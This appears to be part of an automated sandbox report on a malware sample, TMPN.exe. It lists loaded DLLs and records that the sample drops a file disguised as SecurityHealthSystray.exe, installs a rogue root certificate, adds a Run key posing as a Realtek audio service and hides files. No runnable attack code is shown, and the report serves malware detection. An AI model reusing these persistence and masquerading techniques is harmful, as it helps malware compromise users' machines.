Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Section loaded: umpdc.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: TMPN.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: TMPN.exe

Static file information: File size 14904320 > 1048576

Source: TMPN.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4a3c00
Source: TMPN.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x43ca00
Source: TMPN.exe	Static PE information: Raw size of /65 is bigger than: 0x100000 < 0x1a9200
Source: TMPN.exe	Static PE information: Raw size of /78 is bigger than: 0x100000 < 0x10b000

Source: TMPN.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: :C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.pdb source: powershell.exe, 00000010.00000002.2281611258.00000214665AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.pdb source: powershell.exe, 00000010.00000002.2372692651.000002147D03C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.pdbhP source: powershell.exe, 00000010.00000002.2281611258.00000214665AF000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.cmdline"

Source: TMPN.exe	Static PE information: section name: .xdata
Source: TMPN.exe	Static PE information: section name: /4
Source: TMPN.exe	Static PE information: section name: /19
Source: TMPN.exe	Static PE information: section name: /32
Source: TMPN.exe	Static PE information: section name: /46
Source: TMPN.exe	Static PE information: section name: /65
Source: TMPN.exe	Static PE information: section name: /78
Source: TMPN.exe	Static PE information: section name: /90
Source: TMPN.exe	Static PE information: section name: .symtab
Source: SecurityHealthSystray.exe.0.dr	Static PE information: section name: .xdata
Source: SecurityHealthSystray.exe.0.dr	Static PE information: section name: /4
Source: SecurityHealthSystray.exe.0.dr	Static PE information: section name: /19
Source: SecurityHealthSystray.exe.0.dr	Static PE information: section name: /32
Source: SecurityHealthSystray.exe.0.dr	Static PE information: section name: /46
Source: SecurityHealthSystray.exe.0.dr	Static PE information: section name: /65
Source: SecurityHealthSystray.exe.0.dr	Static PE information: section name: /78
Source: SecurityHealthSystray.exe.0.dr	Static PE information: section name: /90
Source: SecurityHealthSystray.exe.0.dr	Static PE information: section name: .symtab

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD3467D2A5 pushad ; iretd	13_2_00007FFD3467D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD347986FA push ebx; ret	13_2_00007FFD3479871A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD347986BB push ebx; ret	13_2_00007FFD347986DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD348671C9 push ebx; retf	13_2_00007FFD348671CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFD347A19BA pushad ; ret	16_2_00007FFD347A19C9
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Code function: 24_2_0000001A591FEA31 push ecx; retf	24_2_0000001A591FEA59
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Code function: 24_2_0000001A591FDBEA push ecx; retf	24_2_0000001A591FDC29
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Code function: 24_2_0000001A591FE8E8 push ecx; retf	24_2_0000001A591FE8E9
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Code function: 24_2_0000001A591FD198 push ecx; retf	24_2_0000001A591FD1F9
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Code function: 24_2_0000001A591FDC3B push ecx; retf	24_2_0000001A591FDCC9

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Users\user\Desktop\TMPN.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Users\user\Desktop\TMPN.exe	Process created: attrib.exe
Source: C:\Users\user\Desktop\TMPN.exe	Process created: attrib.exe
Source: C:\Users\user\Desktop\TMPN.exe	Process created: attrib.exe
Source: C:\Users\user\Desktop\TMPN.exe	Process created: attrib.exe
Source: C:\Users\user\Desktop\TMPN.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: attrib.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.dll			Jump to dropped file
Source: C:\Users\user\Desktop\TMPN.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe			Jump to dropped file

Source: C:\Users\user\Desktop\TMPN.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\partmgr

Jump to behavior

Source: C:\Users\user\Desktop\TMPN.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service			Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\TMPN.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\TMPN.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Users\user\Desktop\TMPN.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
